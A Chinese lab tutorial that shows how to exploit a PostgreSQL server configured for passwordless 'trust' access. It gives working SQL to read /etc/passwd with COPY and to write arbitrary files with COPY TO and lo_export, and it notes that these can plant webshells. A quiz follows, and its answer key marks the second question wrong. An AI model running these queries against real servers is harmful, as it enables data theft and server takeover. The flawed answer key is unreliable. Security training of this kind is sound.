实验目的
本节学习利用PostgreSQL配置不当漏洞实现以下操作:
- 利用PostgreSQL读取服务器磁盘文件
- 利用PostgreSQL向服务器磁盘写文件
实验工具
Navicat Premium
是一款目前互联网上最好用的可多重连接的数据库管理工具,也是navicat premium软件推出的最新版本,能够支持单一程序同时连接到MySQL、MariaDB、SQL Server、SQLite、Oracle和PostgreSQL等数据库。
实验内容
PostgreSQL(也称postgres)是一个自由的对象-关系数据库服务器(数据库管理系统),它在灵活的BSD-风格许可证下发行。它提供了相对其他开放源代码数据库系统(比如 MySQL 和 Firebird),和专有系统(比如 Oracle 、Sybase、IBM的DB2和Microsoft SQL Server)之外的另一种选择。
PostgreSQL在国外的流行程度不亚MySQL,如msf的数据库就是PostgreSQL。但是如果管理员没有正确的配置PostgreSQL,则会导致任意用户无需密码都可以访问PostgreSQL数据库。
通过具体的实验,学习利用PostgreSQL配置不当漏洞控制PostgreSQL并通过PostgreSQL读取服务器磁盘文件、向服务器磁盘写文件。
实验步骤
本次实验文章中演示地址为172.16.190.150,实验学员实际操作测试地址请以实验环境说明中的目标地址172.16.12.2为准。
步骤1 :了解漏洞成因
开始之前,首先了解一下PostgreSQL配置不当漏洞的形成原因:PostgreSQL配置不当漏洞主要是由于管理员配置不当形成的,PostgreSQL配置文件在/var/lib/pgsql/9.2/data/pg_hba.conf,如果管理员没有正确的配置信任的主机,(如下图),则会导致任意用户无需密码都可以访问PostgreSQL数据库
这里简单介绍下pg_hba.conf配置文件,除去注释掉的部分,主要生效的配置内容就是上图红圈部分,解释下这行的意义:
host all all 0.0.0.0/0 trust
host表示匹配类型,第一个all表示任何数据库, 第二个all表示任何数据库用户的访问,0.0.0.0/0表示任何ip地址访问本数据库服务,最后的trust表示对满足条件的主机免密码登录。
于是乎,上述配置则导致:允许任何来源ip主机,使用任何数据库账户,免密码访问任何数据库,这将直接导致了数据库中所有数据泄露。那么此配置还可以留给恶意访问者哪些发挥空间呢?
步骤2 :利用数据库读取文件
首先要连接上数据库服务,打开通过file.ichunqiu.com/69598657下载的实验工具Navicat Premium(需要自行安装),新建连接,数据库类型PostgreSQL:
Host Name里面填写目标机地址172.16.12.2,密码留空:
点击Test connection测试连接:
如上可见,连接成功。点击OK便可保存连接信息,即无需密码即可连接目标机的PostgreSQL服务,但是恶意访问者比较关心PostgreSQL的文件读取及写入方面。
PostgreSQL 8.1以后提供了一组现成的文件操作函数 pg_logdir_ls()、pg_ls_dir()、pg_file_rename()、pg_file_write()、 pg_read_file()、pg_length_file(),难道恶意访问者用这些就可以胡作非为了?
其实并不是,可以用这个函数直接读取/etc/passwd?实际情况下测试并未成功,因为pg_xxx这个adminpack将权限限制在了./postgresql/data下面。
双击进入刚刚创建的连接,再双击进入数据库,点击上方的Query,然后点击下面的New Query,建立一个新的查询窗口:
新的查询窗口如下,下面是查询框,在查询框输入sql语句,点击上面绿色的Run按钮即可
- a)列目录
select pg_ls_dir('./');
如上列取的是当前目录的文件, 但是并不能使用绝对路径和使用../向上层目录跳跃,使用绝对路径和使用../向上层目录跳跃将报错,如下图所示:
- b)读取权限允许的文件
select pg_read_file('postgresql.conf',0,1000);
如上,读取到的只是当前目录下的文件,并不能跨目录读取。这样显然不能满足恶意访问者的需求。
-
c)比较可行的文件读取方案
建表,并使用copy从文件写入数据到表:
DROP TABLE if EXISTS wooyun;
CREATE TABLE wooyun(t TEXT);
COPY wooyun FROM '/etc/passwd';
SELECT * FROM wooyun limit 1 offset 0;
如上,成功读取到了/etc/passwd第一行,继续读第二行:
SELECT * FROM wooyun limit 1 offset 1;
利用注入修改偏移值很快就可以遍历出来了,注入点情况可以使用这种方法,但是还是有点寒碜,比较麻烦。
如下直接读出全部数据:
DROP TABLE if EXISTS wooyun;
CREATE TABLE wooyun (t TEXT);
COPY wooyun(t) FROM '/etc/passwd';
SELECT * FROM wooyun;
如上,成功读取到/etc/passwd文件所有内容,此处可能造成的危害为
数据库泄露、服务器上有读权限的所有文件都可被读取,造成服务器资料泄露。
步骤3 :利用数据库写文件
建表写入并使用COPY导出。
- a)写入文件
DROP TABLE if EXISTS wooyun;
CREATE TABLE wooyun (t TEXT);
INSERT INTO wooyun(t) VALUES ('hello wooyun');
COPY wooyun(t) TO '/tmp/wooyun';
如上,看上述回显应该是成功写入了。接下来我们在尝试读取写入的文件:
DROP TABLE if EXISTS wooyun;
CREATE TABLE wooyun (t TEXT);
COPY wooyun(t) FROM '/tmp/wooyun';
SELECT * FROM wooyun;
如上可见,文件成功写入,并成功读取到源内容。
- b) "大对象"数据写入法
pg_largeobject表保存那些标记着”大对象”的数据。 一个大对象是使用其创建时分配的 OID 标识的。 每个大对象都分解成足够小的小段或者”页面”以便以行的形式存储在 pg_largeobject里。 每页的数据定义为LOBLKSIZE(目前是BLCKSZ/4,或者通常是 2K 字节)。 如下操作即可:
SELECT lo_create(9999);
delete from pg_largeobject where loid=9999;
//创建OID,清空内容
接下来向”大对象”数据写入数据,使用hex:
insert into pg_largeobject (loid,pageno,data) values(9999, 0, decode('74657374207772697465212121', 'hex'));
//74657374207772697465212121是十六进制的“test write!!!”
导出数据到指定文件:
SELECT lo_export(9999, '/tmp/shell.txt');
//默认导出到安装根目录 也可以带路径自由目录写shell
接下来测试读取:
DROP TABLE if EXISTS wooyun;
CREATE TABLE wooyun (t TEXT);
COPY wooyun(t) FROM '/tmp/shell.txt';
SELECT * FROM wooyun;
如上可见,文件成功写入,并成功读取到源内容。
Select lo_unlink(9999);
//最后删除大对象
此处可能造成的危害为如果服务器上还有web服务,恶意访问者可以直接通过以上方法向web目录写入webshell木马等,进而控制服务器。
实验结果分析与总结
通过具体的实验,我们学习利用了PostgreSQL未授权漏洞控制PostgreSQL并通过PostgreSQL读取服务器磁盘文件、向服务器磁盘写文件。
第1题:PostgreSQL如何读取文件内容写入到表 ?
READ wooyun FROM ‘/etc/passwd’;
COPY wooyun FROM ‘/etc/passwd’;
SET wooyun FROM ‘/etc/passwd’;
B
第2题:PostgreSQL如何读取表中内容写入到磁盘文件 ?
WRITE wooyun(t) TO ‘/tmp/wooyun’;
COPY wooyun(t) TO ‘/tmp/wooyun’;
SET wooyun(t) TO ‘/tmp/wooyun’;
C
第3题:PostgreSQL如何创建一个大数据对象?
Select lo_unlink(9999);
Select lo_data(9999);
SELECT lo_create(9999);
C
1398
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
